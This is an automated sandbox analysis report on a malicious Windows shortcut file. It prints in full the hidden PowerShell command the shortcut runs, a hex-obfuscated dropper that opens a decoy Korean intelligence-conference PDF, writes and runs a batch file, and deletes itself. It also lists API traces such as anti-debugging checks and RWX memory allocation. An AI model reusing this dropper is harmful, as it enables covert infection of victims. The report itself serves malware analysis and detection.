Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 13, 2023, 2:01 p.m.	Sept. 13, 2023, 2:04 p.m.

Size	53.7MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=13, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`eaa5aa78668cfe6e6194fce6f2358ca8`
SHA256	`9bd56f46bb0176665cb7c237a7f74abfcb2e670c3f0204f4723c3372a0cc6b21`
CRC32	`69773B35`
ssdeep	`24576:KUs7A7TGz8kFJSyFnFjb9fCj5WYuvreW+vMugMG2gFu/TjP8TOL:JsknGzJrZFnLCj5WYuvA0nMlgFu7jPXL`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Antivirus - Contains references to security software Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "xHmp" C:\Users\test22\AppData\Local\Temp\KOREAN~1.LNK
2616
- cmd.exe "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %a -windowstyle hidden "$ppams ='';$eric5='2464697250617468203d204765742d4c6f636174696f6e3b206966282464697250617468202d4d61746368202753797374656d333227202d6f72202464697250617468202d4d61746368202750726f6772616d2046696c65732729207b2464697250617468203d2027252574656d702525277d3b20246c6e6b50617468203d204765742d4368696c644974656d202d50617468202464697250617468202d52656375727365202a2e6c6e6b207c2077686572652d6f626a656374207b245f2e6c656e677468202d657120307830333541374437457d207c2053656c6563742d4f626a656374202d457870616e6450726f70657274792046756c6c4e616d653b20246c6e6b46696c653d4e65772d4f626a6563742053797374656d2e494f2e46696c6553747265616d28246c6e6b506174682c205b53797374656d2e494f2e46696c654d6f64655d3a3a4f70656e2c205b53797374656d2e494f2e46696c654163636573735d3a3a52656164293b246c6e6b46696c652e5365656b28307830303030314446302c205b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2470646646696c653d4e65772d4f626a65637420627974655b5d20307830303131313741383b246c6e6b46696c652e52656164282470646646696c652c20302c2030783030313131374138293b24706466506174683d53706c69742d5061746820246c6e6b506174683b2450646650617468203d2024706466506174682b275c272b274b6f726561204e6174696f6e616c20496e74656c6c6967656e636520536f636965747920323032332053756d6d65722041636164656d696320436f6e666572656e636520616e6420357468204e6174696f6e616c20537472617465677920436f6c6c6f717569756d202846696e616c29202d204b6f7265612773206e6174696f6e616c20736563757269747920616e6420696e74656c6c6967656e636520696e206120706572696f64206f66206772656174207472616e736974696f6e2e706466273b7363202470646650617468202470646646696c65202d456e636f64696e6720427974653b262024706466506174683b246c6e6b46696c652e5365656b28307830303131333539382c5b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2465786546696c653d4e65772d4f626a65637420627974655b5d20307830303030304433363b246c6e6b46696c652e52656164282465786546696c652c20302c2030783030303030443336293b24657865506174683d24656e763a7075626c69632b275c272b273132303932332e626174273b7363202465786550617468202465786546696c65202d456e636f64696e6720427974653b262024657865506174683b246c6e6b46696c652e436c6f736528293b72656d6f76652d6974656d202d7061746820246c6e6b50617468202d666f7263653b';$bulst='';for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
  2752
  - cmd.exe C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
    2848
  - powershell.exe C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$ppams ='';$eric5='2464697250617468203d204765742d4c6f636174696f6e3b206966282464697250617468202d4d61746368202753797374656d333227202d6f72202464697250617468202d4d61746368202750726f6772616d2046696c65732729207b2464697250617468203d2027252574656d702525277d3b20246c6e6b50617468203d204765742d4368696c644974656d202d50617468202464697250617468202d52656375727365202a2e6c6e6b207c2077686572652d6f626a656374207b245f2e6c656e677468202d657120307830333541374437457d207c2053656c6563742d4f626a656374202d457870616e6450726f70657274792046756c6c4e616d653b20246c6e6b46696c653d4e65772d4f626a6563742053797374656d2e494f2e46696c6553747265616d28246c6e6b506174682c205b53797374656d2e494f2e46696c654d6f64655d3a3a4f70656e2c205b53797374656d2e494f2e46696c654163636573735d3a3a52656164293b246c6e6b46696c652e5365656b28307830303030314446302c205b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2470646646696c653d4e65772d4f626a65637420627974655b5d20307830303131313741383b246c6e6b46696c652e52656164282470646646696c652c20302c2030783030313131374138293b24706466506174683d53706c69742d5061746820246c6e6b506174683b2450646650617468203d2024706466506174682b275c272b274b6f726561204e6174696f6e616c20496e74656c6c6967656e636520536f636965747920323032332053756d6d65722041636164656d696320436f6e666572656e636520616e6420357468204e6174696f6e616c20537472617465677920436f6c6c6f717569756d202846696e616c29202d204b6f7265612773206e6174696f6e616c20736563757269747920616e6420696e74656c6c6967656e636520696e206120706572696f64206f66206772656174207472616e736974696f6e2e706466273b7363202470646650617468202470646646696c65202d456e636f64696e6720427974653b262024706466506174683b246c6e6b46696c652e5365656b28307830303131333539382c5b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2465786546696c653d4e65772d4f626a65637420627974655b5d20307830303030304433363b246c6e6b46696c652e52656164282465786546696c652c20302c2030783030303030443336293b24657865506174683d24656e763a7075626c69632b275c272b273132303932332e626174273b7363202465786550617468202465786546696c65202d456e636f64696e6720427974653b262024657865506174683b246c6e6b46696c652e436c6f736528293b72656d6f76652d6974656d202d7061746820246c6e6b50617468202d666f7263653b';$bulst='';for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));"
    2892

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 13, 2023, 2:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2023, 2:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2023, 2:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2023, 2:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 13, 2023, 2:02 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 13, 2023, 2:02 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 13, 2023, 2:02 p.m.			0	0

Command line console output was observed (40 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 13, 2023, 2:01 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 13, 2023, 2:01 p.m.	buffer: call console_handle: 0x00000007	1	1
WriteConsoleW Sept. 13, 2023, 2:01 p.m.	buffer: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden "$ppams ='';$eric5='2464697250617468203d204765742d4c6f636174696f6e3b206966282464697250617468202d4d61746368202753797374656d333227202d6f72202464697250617468202d4d61746368202750726f6772616d2046696c65732729207b2464697250617468203d2027252574656d702525277d3b20246c6e6b50617468203d204765742d4368696c644974656d202d50617468202464697250617468202d52656375727365202a2e6c6e6b207c2077686572652d6f626a656374207b245f2e6c656e677468202d657120307830333541374437457d207c2053656c6563742d4f626a656374202d457870616e6450726f70657274792046756c6c4e616d653b20246c6e6b46696c653d4e65772d4f626a6563742053797374656d2e494f2e46696c6553747265616d28246c6e6b506174682c205b53797374656d2e494f2e46696c654d6f64655d3a3a4f70656e2c205b53797374656d2e494f2e46696c654163636573735d3a3a52656164293b246c6e6b46696c652e5365656b28307830303030314446302c205b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2470646646696c653d4e65772d4f626a65637420627974655b5d20307830303131313741383b246c6e6b46696c652e52656164282470646646696c652c20302c2030783030313131374138293b24706466506174683d53706c69742d5061746820246c6e6b506174683b2450646650617468203d2024706466506174682b275c272b274b6f726561204e6174696f6e616c20496e74656c6c6967656e636520536f636965747920323032332053756d6d65722041636164656d696320436f6e666572656e636520616e6420357468204e6174696f6e616c20537472617465677920436f6c6c6f717569756d202846696e616c29202d204b6f7265612773206e6174696f6e616c20736563757269747920616e6420696e74656c6c6967656e636520696e206120706572696f64206f66206772656174207472616e736974696f6e2e706466273b7363202470646650617468202470646646696c65202d456e636f64696e6720427974653b262024706466506174683b246c6e6b46696c652e5365656b28307830303131333539382c5b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2465786546696c653d4e65772d4f626a65637420627974655b5d20307830303030304433363b246c6e6b46696c652e52656164282465786546696c652c20302c2030783030303030443336293b24657865506174683d24656e763a7075626c69632b275c272b273132303932332e626174273b7363202465786550617468202465786546696c65202d456e636f64696e6720427974653b262024657865506174683b246c6e6b46696c652e436c6f736528293b72656d6f76652d6974656d202d7061746820246c6e6b50617468202d666f7263653b';$bulst='';for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eric5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($bulst));Invoke-Command -ScriptBlock ([Scriptblock]::Create($ppams));" console_handle: 0x00000007	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: Exception calling "Create" with "1" argument(s): "Unexpected token 's' in expre console_handle: 0x00000023	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: ssion or statement." console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: At line:1 char:2335 console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: + $ppams ='';$eric5='2464697250617468203d204765742d4c6f636174696f6e3b2069662824 console_handle: 0x00000047	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 64697250617468202d4d61746368202753797374656d333227202d6f72202464697250617468202 console_handle: 0x00000053	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: d4d61746368202750726f6772616d2046696c65732729207b2464697250617468203d2027252574 console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 656d702525277d3b20246c6e6b50617468203d204765742d4368696c644974656d202d506174682 console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 02464697250617468202d52656375727365202a2e6c6e6b207c2077686572652d6f626a65637420 console_handle: 0x00000077	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 7b245f2e6c656e677468202d657120307830333541374437457d207c2053656c6563742d4f626a6 console_handle: 0x00000083	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 56374202d457870616e6450726f70657274792046756c6c4e616d653b20246c6e6b46696c653d4e console_handle: 0x0000008f	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 65772d4f626a6563742053797374656d2e494f2e46696c6553747265616d28246c6e6b506174682 console_handle: 0x0000009b	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: c205b53797374656d2e494f2e46696c654d6f64655d3a3a4f70656e2c205b53797374656d2e494f console_handle: 0x000000a7	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 2e46696c654163636573735d3a3a52656164293b246c6e6b46696c652e5365656b2830783030303 console_handle: 0x000000b3	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 0314446302c205b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2470 console_handle: 0x000000bf	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 646646696c653d4e65772d4f626a65637420627974655b5d20307830303131313741383b246c6e6 console_handle: 0x000000cb	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: b46696c652e52656164282470646646696c652c20302c2030783030313131374138293b24706466 console_handle: 0x000000d7	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 506174683d53706c69742d5061746820246c6e6b506174683b2450646650617468203d202470646 console_handle: 0x000000e3	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 6506174682b275c272b274b6f726561204e6174696f6e616c20496e74656c6c6967656e63652053 console_handle: 0x000000ef	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 6f636965747920323032332053756d6d65722041636164656d696320436f6e666572656e6365206 console_handle: 0x000000fb	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 16e6420357468204e6174696f6e616c20537472617465677920436f6c6c6f717569756d20284669 console_handle: 0x00000107	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 6e616c29202d204b6f7265612773206e6174696f6e616c20736563757269747920616e6420696e7 console_handle: 0x00000113	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 4656c6c6967656e636520696e206120706572696f64206f66206772656174207472616e73697469 console_handle: 0x0000011f	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 6f6e2e706466273b7363202470646650617468202470646646696c65202d456e636f64696e67204 console_handle: 0x0000012b	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 27974653b262024706466506174683b246c6e6b46696c652e5365656b2830783030313133353938 console_handle: 0x00000137	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 2c5b53797374656d2e494f2e5365656b4f726967696e5d3a3a426567696e293b2465786546696c6 console_handle: 0x00000143	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 53d4e65772d4f626a65637420627974655b5d20307830303030304433363b246c6e6b46696c652e console_handle: 0x0000014f	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 52656164282465786546696c652c20302c2030783030303030443336293b24657865506174683d2 console_handle: 0x0000015b	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 4656e763a7075626c69632b275c272b273132303932332e626174273b7363202465786550617468 console_handle: 0x00000167	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 202465786546696c65202d456e636f64696e6720427974653b262024657865506174683b246c6e6 console_handle: 0x00000173	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: b46696c652e436c6f736528293b72656d6f76652d6974656d202d7061746820246c6e6b50617468 console_handle: 0x0000017f	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: 202d666f7263653b';$bulst='';for($i=0;$i -le $eric5.Length-2;$i=$i+2){$NTMO=$eri console_handle: 0x0000018b	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: c5[$i]+$eric5[$i+1];$bulst= $bulst+[char]([convert]::toint16($NTMO,16));};Invok console_handle: 0x00000197	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: e-Command -ScriptBlock ([Scriptblock]::Create <<<< ($bulst));Invoke-Command -Sc console_handle: 0x000001a3	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: riptBlock ([Scriptblock]::Create($ppams)); console_handle: 0x000001af	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001bb	1	1
WriteConsoleW Sept. 13, 2023, 2:02 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000001c7	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005544c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554ec0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554bc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554d00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00555040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 13, 2023, 2:02 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00554f80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 13, 2023, 2:02 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 146 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02890000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01eda000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ed2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0221a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02227000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 13, 2023, 2:02 p.m.	process_identifier: 2892 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01edb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
